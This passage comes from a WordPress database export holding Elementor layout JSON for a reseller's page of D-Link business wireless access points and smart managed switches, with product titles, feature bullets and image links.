Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7515,3402,'_elementor_version','2.5.14'),(7516,3402,'_elementor_edit_mode','builder'),(7519,3403,'_wp_page_template','template-fullwidth.php'),(7520,3403,'_elementor_template_type','post'),(7521,3403,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T 